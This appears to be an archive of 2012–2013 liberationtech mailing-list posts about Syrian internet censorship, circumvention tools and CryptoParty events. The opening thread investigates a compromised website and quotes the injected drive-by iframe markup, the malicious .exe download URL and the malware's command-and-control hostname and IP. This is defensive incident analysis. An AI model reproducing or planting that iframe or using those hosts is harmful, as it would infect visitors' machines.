 Rabbani:
 holly shit:
 
 iframe name=I1 width=10 height=10 
 src=http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe;
 
 
 border=0
 frameborder=0
 
 
 :/ if you are running windows don't even go there!!!
 
 
 Andrew Lewis:
 I can get to this in 6 hours or so, maybe someone is willing to 
 jump on this before then?
 
 -Andrew
 
 On Jan 30, 2013, at 11:06 AM, KheOps khe...@ceops.eu wrote:
 
 Dear Libtech,

 We just saw that the website : http://www.syrian-martyrs.com
 is probably compromised. Every page of the website contains an 
 iFrame which links to a .exe file which is detected as a virus
 by antivirus software: 
 http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe



 

 The fact that the HTML code is present at the bottom of each page makes
 me think that the index.php page has been changed in a way
 that makes that iFrame appear on every page of the website,
 after the dynamic content.

 It also probably means that the attackers have some kind of 
 access to the server. My guess would be going to a PHP shell,
 but I'm no expert in this.

 Any help, clue, investigation, would be very welcome :)

 Thank you, KheOps

 -- Unsubscribe, change to digest, or change password at: 
 https://mailman.stanford.edu/mailman/listinfo/liberationtech
 -- Unsubscribe, change to digest, or change password at: 
 https://mailman.stanford.edu/mailman/listinfo/liberationtech
 
 
 
 
 
 --
 Unsubscribe, change to digest, or change password at: 
 https://mailman.stanford.edu/mailman/listinfo/liberationtech
 

--
Unsubscribe, change to digest, or change password at: 
https://mailman.stanford.edu/mailman/listinfo/liberationtech

Re: [liberationtech] Syrian-martyrs.com website probably compromised by virus

2013-01-29 Thread KheOps
Hello,

Le 30/01/2013 03:02, SiNA Rabbani a écrit :
 Ok. I infected an old Windoes xp with this malware and it keeps
 sending SYN requests to this hostname: awrasx10.no-ip.biz which
 currently resolved to: 37.236.124.197 and is down for me.

Thank you for your work :) The hostname still resolves the same,
37.236.124.197, which is an Iraqi IP address.

Maybe the port  on that IP is supposed to host a CC, I don't know.

Could be worth letting it run longer, maybe the CC only comes up sometimes?

 
 --SiNA
 Internet Protocol Version 4, Src: 10.10.10.17 (10.10.10.17), Dst:
 37.236.124.197 (37.236.124.197)
 Version: 4
 Header length: 20 bytes
 Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN:
 0x00: Not-ECT (Not ECN-Capable Transport))
  00.. = Differentiated Services Codepoint: Default (0x00)
  ..00 = Explicit Congestion Notification: Not-ECT (Not
 ECN-Capable Transport) (0x00)
 Total Length: 48
 Identification: 0x06b0 (1712)
 Flags: 0x02 (Don't Fragment)
 0...  = Reserved bit: Not set
 .1..  = Don't fragment: Set
 ..0.  = More fragments: Not set
 Fragment offset: 0
 Time to live: 128
 Protocol: TCP (6)
 Header checksum: 0x3d4c [correct]
 [Good: True]
 [Bad: False]
 Source: 10.10.10.17 (10.10.10.17)
 Destination: 37.236.124.197 (37.236.124.197)
 Transmission Control Protocol, Src Port: llsurfup-https (1184), Dst
 Port: distinct (), Seq: 0, Len: 0
 Source port: llsurfup-https (1184)
 Destination port: distinct ()
 [Stream index: 2258]
 Sequence number: 0(relative sequence number)
 Header length: 28 bytes
 Flags: 0x002 (SYN)
 Window size value: 65535
 [Calculated window size: 65535]
 Checksum: 0xdc28 [validation disabled]
 Options: (8 bytes)
 

KheOps

--
Unsubscribe, change to digest, or change password at: 
https://mailman.stanford.edu/mailman/listinfo/liberationtech

Re: [liberationtech] Google Hangout the new, better skype? Was Re: Skype redux

2012-12-21 Thread KheOps
Hi everyone :)

Le 21/12/2012 17:29, liberationt...@lewman.us a écrit :
 On Fri, 21 Dec 2012 06:52:35 -0800
 Brian Conley bri...@smallworldnews.tv wrote:
 
 So I guess the question is, is there a more/similarly convenient
 video/audio chatting tool that can be advocated as a standard?
 
 Here's a single data point, extrapolate at your peril, I use Jitsi,
 https://jitsi.org/.

We have tried to push Jitsi forward as a replacement to Skype, notably
with Syrian people. In the first tries we did, it appeared really not
easy to use from Syria, mainly because of the poor bandwidth there which
seemed to prevent video calls to work correctly and NAT issues.

We however haven't had time to dig more in Jitsi settings, and I wonder
if someone had a good URL for documentation/tutorial?

Thank you :)
KheOps

--
Unsubscribe, change to digest, or change password at: 
https://mailman.stanford.edu/mailman/listinfo/liberationtech

[liberationtech] Tor bridges blocked in Syria?

2012-12-16 Thread KheOps
Hello everyone,

I just saw that, and asked around via TelecomixSyria account for more info:

https://twitter.com/dlshadothman/status/280415561681350657

Dlshad is promoting the use of the obfsproxy-enabled version of Tor as a
consequence. However, I did not see if the blockade is based on the
public list of Tor relays IP addresses, or if it's Iran-style blockade
(detecting the Tor traffic).

If it is the second case, this may mean the regime has setup new
equipment for the blockade, which may have been done during that 3 days
blackout.

Does anyone have any more detail about this?

KheOps

--
Unsubscribe, change to digest, or change password at: 
https://mailman.stanford.edu/mailman/listinfo/liberationtech

Re: [liberationtech] /. ITU Approves Deep Packet Inspection

2012-12-06 Thread KheOps
Hi,

Le 05/12/2012 23:10, Pavol Luptak a écrit :
 On Wed, Dec 05, 2012 at 07:27:27PM +0100, Christian Fuchs wrote:

[...]

 
 DPI censorship is not a 'competitive' advantage, so it's quite likely that
 in a pure market society ('anarchocapitalism') without strong socialistic
 governments and their stupid Internet regulations, most Internet providers 
 WILL
 NOT censor their connections, otherwise they will loose their customers. Most
 customers are not willing to pay for censored Internet if they can choose
 unfiltered free Internet. And the only one who can take them this right is
 a monopoly for laws/regulations - the centralized government.

I'd say it can happen for purely economic reasons. For instance, in
France, some ISPs used to have marketing agreements with Dailymotion and
consequently slowed down Youtube access.

Another exemple is the will to forbid VoIP on 3G connections in order to
force people to continue using the old GSM thingy (also happening in
France afaik).

KheOps

--
Unsubscribe, change to digest, or change password at: 
https://mailman.stanford.edu/mailman/listinfo/liberationtech

Re: [liberationtech] Censorship hardware - BLUECOAT IN SYIA

2012-12-02 Thread KheOps
Hey,

Le 03/12/2012 01:11, L. Aaron Kaplan a écrit :
 
 On Dec 2, 2012, at 2:00 AM, KheOps wrote:

[...]

 What if that second picture - the one that popped up today - had been
 taken just recently by some opponent to the regime who managed to gain
 access to the Tarassul technical office; that intrusion could have lead
 the regime to do a kind of massive shutdown?

 As I said, this might make no sense at all. But in a way, such a total
 disruption, including the governmental/stock exchange/whatever websites
 could be something the regime itself did not really want.

[...]

 Does anyone have any info on the paths that the fiber cables are taking from 
 Tartus till Damascus?
 If they are not to cross the border and go to Lebanon, then they must pass by 
 Homs. Usually fiber lines are next to train tracks or highways.

Tartus is to my knowledge under regime control, as people there are
mostly pro-regime. As for the rest of the path that the cables can take,
I have no idea.

 Also the pictures from Tarassul which you reference above are to my knowledge 
 in Alleppo. 

Sounds very strange to me. As far as I know they would rather be located
in Damascus, either in a STE or Tarassul building. I'll ask around to
fetch more info, if possible.

 Can anyone here say for sure that rebels could easily enter that building 
 since it is in their controlled territory?
 
 But let's analyze this: what happens when some rebels enter the building 
 where the blue-coats are ?
 What would they gain from cutting off the connections? 

Nothing, but I can easily imagine people saying those are the f*cking
BlueCoats that are spying on us, let's unplug them without
understanding that this would cause a massive outage.

KheOps

--
Unsubscribe, change to digest, or change password at: 
https://mailman.stanford.edu/mailman/listinfo/liberationtech

Re: [liberationtech] Censorship hardware - BLUECOAT IN SYIA

2012-12-02 Thread KheOps
Le 03/12/2012 01:11, L. Aaron Kaplan a écrit
 Does anyone have any info on the paths that the fiber cables are taking from 
 Tartus till Damascus?
 If they are not to cross the border and go to Lebanon, then they must pass by 
 Homs. Usually fiber lines are next to train tracks or highways.

Just another input: the cause of the outage is probably not a cut fiber,
since inside the country the mobile coverage was down too, as well as
landlines (not totally, though).

--
Unsubscribe, change to digest, or change password at: 
https://mailman.stanford.edu/mailman/listinfo/liberationtech

Re: [liberationtech] Censorship hardware - BLUECOAT IN SYIA

2012-12-01 Thread KheOps
Hi everyone,

Le 01/12/2012 20:36, Bernard Tyers a écrit :
 About the photo: is there any idea where that photo was taken, and what
 date? Is it possible to get photos of the back of the rack?

A similar picture was seen quite a while ago, on what was said to be the
official Tarassul (main ISP in Syria, strongly linked to STE) Facebook
page. Here it is:
https://resources.telecomix.ceops.eu/material/bluecoat-Syria/tarassul-datacenter.jpg

Clearly shows a number of BlueCoat appliances too, in a technical center
containing servers etc.

The BlueCoats are known to be technically on the Tarassul network, even
though they are used for more than just this ISP.

Cheers,
KheOps

--
Unsubscribe, change to digest, or change password at: 
https://mailman.stanford.edu/mailman/listinfo/liberationtech

Re: [liberationtech] Censorship hardware - BLUECOAT IN SYIA

2012-12-01 Thread KheOps
Hey, I'm thinking something that could be a total nonsense, but just in
case I would like to share my thougths.

Le 01/12/2012 19:39, Rafal Rohozinski a écrit :
 This pic has just been posted on twitter.  It was picked up by the
 Secdev Syria Operation Group. It is allegeldy a picture of internet
 censorship hardware taken inside a telecom hub (exchange) in
 Damascus, http://twitter.com/AmaraaBaghdad/status/274919986399703040/photo/1

This picture just popped up on Twitter. A long time ago there was a
picture taken from the official Tarassul Facebook pages that obviously
show the same devices in the same office -
https://resources.telecomix.ceops.eu/material/bluecoat-Syria/tarassul-datacenter.jpg

What if that second picture - the one that popped up today - had been
taken just recently by some opponent to the regime who managed to gain
access to the Tarassul technical office; that intrusion could have lead
the regime to do a kind of massive shutdown?

As I said, this might make no sense at all. But in a way, such a total
disruption, including the governmental/stock exchange/whatever websites
could be something the regime itself did not really want.

--
Unsubscribe, change to digest, or change password at: 
https://mailman.stanford.edu/mailman/listinfo/liberationtech

[liberationtech] CryptoParty in Tunis tomorrow (Saturday, 1st December)

2012-11-30 Thread KheOps
Dear all,

With quite a short delay (sorry for that!) we're kicking off a
CryptoParty tomorrow in Tunis. It will be held at the Engineering School
ENSI (National School of Computer Sciences), and will start at 2PM.
People will first meet in the main theatre.

You may be aware that a previous event called CryptoParty was organized
during the OpenITP Tech Summit on 27th November. However, the organizers
required people to give their real ID in order to participate,
requirement that was considered as not acceptable by a number of people,
including people from the Tunis hackerspace.

The event happening tomorrow is open to anyone, no control of any kind
will be done.

With datalove,
KheOps

--
Unsubscribe, change to digest, or change password at: 
https://mailman.stanford.edu/mailman/listinfo/liberationtech

Re: [liberationtech] CryptoParty in Tunis tomorrow (Saturday, 1st December)

2012-11-30 Thread KheOps
Le 01/12/2012 01:50, Dragana Kaurin a écrit :
  Awesome, looking forward to it! Having some difficulty finding the location 
 - can you give me an address and tell me which building on the campus? 

MMh even though I'll be attending, I'm not a Tunisian and will be guided
to the school by some local friends.

However, you will find a map link there: https://cryptoparty.org/wiki/Tunis

I can also tell that it's in the Manouba area. There is a metro going
there (actually it's a tramway, but called metro here :)

Alternately, I'm going to meet up with a friend from hackerspace TN
tomorrow at about 1PM at Place de la République (also named Passage)
and we'll take transports to the ENSI. You'll find my face on the web if
you want to spot me more easily.

 
 On Friday, November 30, 2012 15:57 EST, KheOps khe...@ceops.eu wrote: 
  
 Dear all,

 With quite a short delay (sorry for that!) we're kicking off a
 CryptoParty tomorrow in Tunis. It will be held at the Engineering School
 ENSI (National School of Computer Sciences), and will start at 2PM.
 People will first meet in the main theatre.

 You may be aware that a previous event called CryptoParty was organized
 during the OpenITP Tech Summit on 27th November. However, the organizers
 required people to give their real ID in order to participate,
 requirement that was considered as not acceptable by a number of people,
 including people from the Tunis hackerspace.

 The event happening tomorrow is open to anyone, no control of any kind
 will be done.

 With datalove,
 KheOps


--
Unsubscribe, change to digest, or change password at: 
https://mailman.stanford.edu/mailman/listinfo/liberationtech

Re: [liberationtech] Request for comments: Gaza Trust Package

2012-11-20 Thread KheOps
Le 20/11/2012 04:58, Uncle Zzzen a écrit :
 Maybe a few VPN software as well?
 I don't know any VPN software packages for any platform. I have linux
 (so it comes with openvpn) and not many people have computers where I
 live :). Is there anything standard (and open-source) for Windows and
 mac, or is it provider-dependent? (I know that some VPN providers
 generate a user-specific .exe installer).
 
 Also: are VPNs a practical solution for an untrusted zone?

Well, you're right, a VPN software such as OpenVPN still needs some VPN
provider to connect to. Unlike Tor that can work out of the box.

However, since your guide seems to be designed for geek users, if
there exists an OpenVPN executable that can be downloaded for Windows
and Mac, it might be relevant put its checksum there as well.

KheOps

--
Unsubscribe, change to digest, or change password at: 
https://mailman.stanford.edu/mailman/listinfo/liberationtech

Re: [liberationtech] Request for comments: Gaza Trust Package

2012-11-20 Thread KheOps
Le 20/11/2012 12:13, Uncle Zzzen a écrit :
 However, since your guide seems to be designed for geek users, if
 there exists an OpenVPN executable that can be downloaded for Windows
 and Mac, it might be relevant put its checksum there as well.
 
 I agree that if someone who clones this knows and /trusts/ VPN software
 for these platforms, he/she should add them ;)

Well, OpenVPN for Windows is still an opensource software. Is there any
reason it should not be trusted?

--
Unsubscribe, change to digest, or change password at: 
https://mailman.stanford.edu/mailman/listinfo/liberationtech

Re: [liberationtech] Request for comments: Gaza Trust Package

2012-11-19 Thread KheOps
Hi,

Le 19/11/2012 21:44, Uncle Zzzen a écrit :
 Please comment on https://gist.github.com/4112966/ and let me know what
 you think I should change before I can remove the word experimental
 and start spreading this.

Unless I didn't see it, may I suggest to add links and checksums for the
Tor Browser Bundle on Linux  Mac?

Maybe a few VPN software as well?

Just the classical ideas that come through my mind though, since I don't
know how bad is the communication in Gaza.

Cheers,
KheOps

--
Unsubscribe, change to digest, or change password at: 
https://mailman.stanford.edu/mailman/listinfo/liberationtech

Re: [liberationtech] Arabic Pidgin-OTR Tutorial

2012-11-18 Thread KheOps
Le 18/11/2012 16:26, Marcin de Kaminski a écrit :
 Also, since it was discussed on this list: what is the status of Pidgin
 OTR? Didn't it have some sec flaws?
 

As far as I remember, Pidgin has can use (through libpurple) two
different libraries to handle SSL connections - one of them seemed to be
really broken.

However, I think the OTR plugin has a pretty good reputation, and a
private OTR conversation (with verified fingerprints), even using a
broken SSL implementation from Pidgin, provides an end-to-end encryption
of the discussion.

Hence, I tend to think, using Pidgin + that OTR plugin still looks to be
a good advice to me.

Correct me if I'm wrong :)

KheOps

--
Unsubscribe, change to digest, or change password at: 
https://mailman.stanford.edu/mailman/listinfo/liberationtech

Re: [liberationtech] Arabic Pidgin-OTR Tutorial

2012-11-18 Thread KheOps
Let myself be more precise,

Le 18/11/2012 23:17, KheOps a écrit :
 Le 18/11/2012 16:26, Marcin de Kaminski a écrit :
 Also, since it was discussed on this list: what is the status of Pidgin
 OTR? Didn't it have some sec flaws?

 
 As far as I remember, Pidgin has can use (through libpurple) two
 different libraries to handle SSL connections - one of them seemed to be
 really broken.

I do not think the library itself is broken, it's the way libpurple uses it.

--
Unsubscribe, change to digest, or change password at: 
https://mailman.stanford.edu/mailman/listinfo/liberationtech

Re: [liberationtech] CryptoParty Handbook

2012-10-05 Thread KheOps
Good day to you all :)

On 10/05/2012 03:57 AM, Griffin Boyce wrote:
 Hey all,
 
   Considering both the complexity of material and the time constraints
 involved, the handbook came out beautifully. It's well-laid out and
 covers a surprisingly large number of topics step-by-step at a beginner
 level.  Anyone who has a solid understanding of how to use the internet
 can be taught how to use common encryption tools with this manual.  And
 that in and of itself is amazing.

Yes, I found amazing that such a thing was produced in such a short
amount of time. It can't be expected to be perfect and totally
up-to-date with bleeding edge knowledge on security, but can be a very
good start for introducing a lot of topics, provided that some mistakes
are corrected (e.g. the file shredding things).

In any case the initiative is excellent. It could deserve translations
in other languages.

 
   Having it in wiki format is tricky because of vandalism, but perhaps
 turning it into a github repository might be a better option. That way,
 you could see updates line-by-line and cherry-pick the ones you
 want/don't want.
 

I was wondering if a LaTeX file + git repository could be a good idea?
Any comment on this?

Cheers,
KheOps

--
Unsubscribe, change to digest, or change password at: 
https://mailman.stanford.edu/mailman/listinfo/liberationtech

Re: [liberationtech] Hearing Syria internet cut

2012-07-21 Thread KheOps
Hey,

On 07/20/2012 04:45 PM, Walid AL-SAQAF alkasir admin wrote:
 Hi all,
 
 I confirm that there appears to be an issue with users of Alkasir from
 Syria lately. Users from 14 different ISPs used to connect, but
 recently, only 11 ISPs are used and I noticed that no users are coming
 through the following ISPs:
 
   * INET-INTERNET-SERVICE-PROVIDER
   * RUNNET
   * TARASSUL-INETNET-SERVICE-PROVIDER
 

One subscriber of Tarassul reported that at some point he was attributed
an IP address of E-lcom ISP instead of one of Tarassul. There might be
tech problems there.

Maybe some areas of Damascus were shaken and part of the infrastructure
has been damaged?

 
 Sincerely,
 
 Walid

KheOps



signature.asc
Description: OpenPGP digital signature
___
liberationtech mailing list
liberationtech@lists.stanford.edu

Should you need to change your subscription options, please go to:

https://mailman.stanford.edu/mailman/listinfo/liberationtech

If you would like to receive a daily digest, click yes (once you click above) 
next to would you like to receive list mail batched in a daily digest?

You will need the user name and password you receive from the list moderator in 
monthly reminders. You may ask for a reminder here: 
https://mailman.stanford.edu/mailman/listinfo/liberationtech

Should you need immediate assistance, please contact the list moderator.

Please don't forget to follow us on http://twitter.com/#!/Liberationtech

Re: [liberationtech] Hearing Syria internet cut

2012-07-20 Thread KheOps
Hi,

Tarassul ISP (also the biggest in Syria) seems to be specifically
undergoing problems to reach some hosts. But until now our tests only
showed quite random results.

KheOps

On 07/20/2012 11:55 AM, Brian Conley wrote:
 I have a colleague who was in touch with multiple individuals in Syria today, 
 I believe after 1400 utc, but I have to confirm.
 
 Sent from my iPad
 
 On Jul 20, 2012, at 2:20, Andrew Lewis and...@pdqvpn.com wrote:
 


 And those prefixes cover the entire commercial Internet space, in effect all 
 of Syria was down. 

 There have also been reports of routing issues all day. I haven't been able 
 to confirm. 

 I honestly think we are headed towards a communication blackout. 

 Andrew

 On Jul 20, 2012, at 4:54 AM, Eugen Leitl eu...@leitl.org wrote:

 - Forwarded message from Andree Toonk andree+na...@toonk.nl -

 From: Andree Toonk andree+na...@toonk.nl
 Date: Thu, 19 Jul 2012 23:21:21 -0700
 To: George Bonser gbon...@seven.com
 Cc: na...@nanog.org na...@nanog.org
 Subject: Re: Hearing Syria internet cut
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6;
   rv:13.0) Gecko/20120614 Thunderbird/13.0.1
 Reply-To: and...@toonk.nl

 .-- My secret spy satellite informs me that at 12-07-19 10:00 PM  George
 Bonser wrote:
 Can anyone confirm? 

 Yes confirmed, about 90% of the Syrian prefixes disappeared from the BGP
 tables between 13:32 and 14:13 (UTC) earlier today (2012-07-19).

 Cheers,
 Andree



 - End forwarded message -
 -- 
 Eugen* Leitl a href=http://leitl.org;leitl/a http://leitl.org
 __
 ICBM: 48.07100, 11.36820 http://www.ativel.com http://postbiota.org
 8B29F6BE: 099D 78BA 2FD3 B014 B08A  7779 75B0 2443 8B29 F6BE
 ___
 liberationtech mailing list
 liberationtech@lists.stanford.edu

 Should you need to change your subscription options, please go to:

 https://mailman.stanford.edu/mailman/listinfo/liberationtech

 If you would like to receive a daily digest, click yes (once you click 
 above) next to would you like to receive list mail batched in a daily 
 digest?

 You will need the user name and password you receive from the list 
 moderator in monthly reminders. You may ask for a reminder here: 
 https://mailman.stanford.edu/mailman/listinfo/liberationtech

 Should you need immediate assistance, please contact the list moderator.

 Please don't forget to follow us on http://twitter.com/#!/Liberationtech
 ___
 liberationtech mailing list
 liberationtech@lists.stanford.edu

 Should you need to change your subscription options, please go to:

 https://mailman.stanford.edu/mailman/listinfo/liberationtech

 If you would like to receive a daily digest, click yes (once you click 
 above) next to would you like to receive list mail batched in a daily 
 digest?

 You will need the user name and password you receive from the list moderator 
 in monthly reminders. You may ask for a reminder here: 
 https://mailman.stanford.edu/mailman/listinfo/liberationtech

 Should you need immediate assistance, please contact the list moderator.

 Please don't forget to follow us on http://twitter.com/#!/Liberationtech
 ___
 liberationtech mailing list
 liberationtech@lists.stanford.edu
 
 Should you need to change your subscription options, please go to:
 
 https://mailman.stanford.edu/mailman/listinfo/liberationtech
 
 If you would like to receive a daily digest, click yes (once you click 
 above) next to would you like to receive list mail batched in a daily 
 digest?
 
 You will need the user name and password you receive from the list moderator 
 in monthly reminders. You may ask for a reminder here: 
 https://mailman.stanford.edu/mailman/listinfo/liberationtech
 
 Should you need immediate assistance, please contact the list moderator.
 
 Please don't forget to follow us on http://twitter.com/#!/Liberationtech
 




signature.asc
Description: OpenPGP digital signature
___
liberationtech mailing list
liberationtech@lists.stanford.edu

Should you need to change your subscription options, please go to:

https://mailman.stanford.edu/mailman/listinfo/liberationtech

If you would like to receive a daily digest, click yes (once you click above) 
next to would you like to receive list mail batched in a daily digest?

You will need the user name and password you receive from the list moderator in 
monthly reminders. You may ask for a reminder here: 
https://mailman.stanford.edu/mailman/listinfo/liberationtech

Should you need immediate assistance, please contact the list moderator.

Please don't forget to follow us on http://twitter.com/#!/Liberationtech

Re: [liberationtech] Julian Assange is seeking asylum

2012-06-19 Thread KheOps
hai,

On 06/19/2012 09:09 PM, Frank Corrigan wrote:
 Wikileaks founder Julian Assange is seeking asylum at Ecuador's embassy
 in London, says Ecuador foreign minister.
 http://www.bbc.co.uk/news/uk-18514726

It looks like Assange has a huge sense of trolling. :)

Cheers,
KheOps



signature.asc
Description: OpenPGP digital signature
___
liberationtech mailing list
liberationtech@lists.stanford.edu

Should you need to change your subscription options, please go to:

https://mailman.stanford.edu/mailman/listinfo/liberationtech

If you would like to receive a daily digest, click yes (once you click above) 
next to would you like to receive list mail batched in a daily digest?

You will need the user name and password you receive from the list moderator in 
monthly reminders. You may ask for a reminder here: 
https://mailman.stanford.edu/mailman/listinfo/liberationtech

Should you need immediate assistance, please contact the list moderator.

Please don't forget to follow us on http://twitter.com/#!/Liberationtech

Re: [liberationtech] Syria blackout?

2012-05-31 Thread KheOps
Yes, this has been confirmed by several people we know there.

Tor seems to be blocked at least on 3G connections. Download of some
file extensions through cleartext HTTP is blocked too (mp4, flv, mpg, ...).

It seems UltraSurf and some other VPNs are blocked too, though as Andrew
said, some other specific ones continue working.

For Tor, it would be worth setting up obfsproxy-equipped bridges. We
will try to work on this asap on our side.

KheOps

On 05/31/2012 08:36 PM, Andrew wrote:
 And it looks like I maybe wrong. It seems that torrents, and videos
 stopped working sometime yesterday. I am going to do some more
 digging. Tor, and some specific types of VPNs still seem to be working
 fine.
 
 -Andrew
 
 On 5/31/2012 2:26 PM, Eugen Leitl wrote:
 - Forwarded message from Rafael Cresci raf...@cresci.org
 -
 
 From: Rafael Cresci raf...@cresci.org Date: Thu, 31 May 2012
 14:41:09 -0300 To: na...@nanog.org Subject: Syria blackout? 
 X-Mailer: Apple Mail (2.1278)
 
 Customers (from UAE) who have servers with us in Atlanta - one of
 the companies I work for, remaining anonymus for the moment - are
 reporting that their sub-customers and viewers from Syria can't
 access FTP or download any kind of Flash/video/multimedia content
 from inside that country. Completely blocked.
 
 Anyone confirms?
 
 Another government blockage to avoid social captiruing of massacre
 videos and photos?
 
 
 - End forwarded message -
 
 ___
 liberationtech mailing list
 liberationtech@lists.stanford.edu
 
 Should you need to change your subscription options, please go to:
 
 https://mailman.stanford.edu/mailman/listinfo/liberationtech
 
 If you would like to receive a daily digest, click yes (once you click 
 above) next to would you like to receive list mail batched in a daily 
 digest?
 
 You will need the user name and password you receive from the list moderator 
 in monthly reminders. You may ask for a reminder here: 
 https://mailman.stanford.edu/mailman/listinfo/liberationtech
 
 Should you need immediate assistance, please contact the list moderator.
 
 Please don't forget to follow us on http://twitter.com/#!/Liberationtech



signature.asc
Description: OpenPGP digital signature
___
liberationtech mailing list
liberationtech@lists.stanford.edu

Should you need to change your subscription options, please go to:

https://mailman.stanford.edu/mailman/listinfo/liberationtech

If you would like to receive a daily digest, click yes (once you click above) 
next to would you like to receive list mail batched in a daily digest?

You will need the user name and password you receive from the list moderator in 
monthly reminders. You may ask for a reminder here: 
https://mailman.stanford.edu/mailman/listinfo/liberationtech

Should you need immediate assistance, please contact the list moderator.

Please don't forget to follow us on http://twitter.com/#!/Liberationtech